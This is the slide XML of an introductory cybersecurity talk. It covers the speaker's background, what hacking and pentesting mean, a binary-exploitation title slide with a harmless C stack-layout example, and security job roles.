        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216360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25AADCBA-8B92-4FBD-B325-3AA53CFF953E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685802" y="2142067"/>
            <a:ext cx="6282266" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Who Am I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is real hacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pentesting steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Learn hacking by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CTFs - Technical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cyber security jobs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Q&amp;A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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130" y="1798122"/>
            <a:ext cx="3688278" cy="3688278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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9676496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026" y="387156"/>
            <a:ext cx="10058400" cy="1550854"/>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026" y="2220532"/>
            <a:ext cx="8114286" cy="3485715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1497120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18310" y="1667054"/>
            <a:ext cx="10131425" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Binary Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330383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ce réservé du contenu 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3893410707"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="757052" y="3459699"/>
          <a:ext cx="10131425" cy="1854200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10131425"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Stack</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>var_4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> -&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 64 byte</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>var_3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> -&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 64 byte</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>var_2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> -&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 64 byte</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>var_1 -&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 64 byte</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="735872" y="1144772"/>
            <a:ext cx="2862351" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>nt main {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>char var_1 [64];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	char var_2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	char var_3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[64];</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	char var_4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>return 0;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4255376" y="1624794"/>
            <a:ext cx="3262624" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LAST IN FIRST OUT</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Connecteur droit avec flèche 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5700156" y="2209569"/>
            <a:ext cx="86983" cy="114325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83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4975" y="633371"/>
            <a:ext cx="10387206" cy="5600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4772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537" y="1465526"/>
            <a:ext cx="11631237" cy="3260854"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25808556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Cyber  security  jobs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Penetration tester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Red teamer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bug bounty hunter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>White box pentester</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Espace réservé du contenu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33294" y="2680494"/>
            <a:ext cx="4572000" cy="2571750"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28368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Q&amp;A</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"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5856" y="1832459"/>
            <a:ext cx="7507535" cy="4219235"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24256105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38300" y="0"/>
            <a:ext cx="10131425" cy="2334930"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Bahnschrift SemiBold" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tank you for your Attention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Bahnschrift SemiBold" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stay in touch</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="4400" b="1" dirty="0">
              <a:latin typeface="Bahnschrift SemiBold" panose="020B0502040204020203"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952" y="755629"/>
            <a:ext cx="29813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380" y="3465677"/>
            <a:ext cx="3095625"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61060" y="2108308"/>
            <a:ext cx="6096000" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://twitter.com/m3z0diac</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://linkedin.com/in/hamza-elansari/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://hamza07-w.github.io/hamza-elansari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://facebook.com/hamza.elansari.py</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29656183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About  me</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="1678942"/>
            <a:ext cx="5216235" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>┌──</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>💀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)-[~]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>└─</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>whoami</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It's my pleasure to introduce my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>self .. well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, My name is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hamza Elansari. Leader of HK-GANG, One from the famous and big Moroccan communities of cyber security and development experts. We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Won Two Titles In Different Categories By "Moroccan Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Awards“</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also I am a Back-end developer, Cyber security content creator</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>My Portfolio: hamza07-w.github.io/hamza-elansari</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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76923" y="2380765"/>
            <a:ext cx="2286239" cy="2286239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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90390" y="2395359"/>
            <a:ext cx="2296113" cy="2271645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119442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WHAT  IS  REAL  HACKING ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="673926" y="1085170"/>
            <a:ext cx="5703123" cy="4603111"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the hacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>keyword </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for me it's not just someone who hack a system or a network .. it's more than that, for me hacking is a lifestyle it's the curiosity of how things work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>most of us from our childhood is a hacker, and that because when we was kids we was very nosy how the radio or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PlayStation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for example work? so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you will take it and break it</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421" y="1710046"/>
            <a:ext cx="5097152" cy="2867148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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63439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WHAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> IS  REAL  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HACKING ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="673926" y="1638795"/>
            <a:ext cx="10131425" cy="1650670"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>From the technical way, let’s forget hacking keyword and use cyber security or pentest keywords instead. The pentesting it’s based to scan the target (application, system, network, company ..) for find any weaknesses (vulnerabilities), after that trying to exploiting them to get full control of the victim machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" inden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5" y="2881110"/>
            <a:ext cx="7742712" cy="3601467"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4628841" y="4068448"/>
            <a:ext cx="1453860" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web server</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7179193" y="5858104"/>
            <a:ext cx="1987019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sensitive server</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2162733" y="5905604"/>
            <a:ext cx="1144929" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
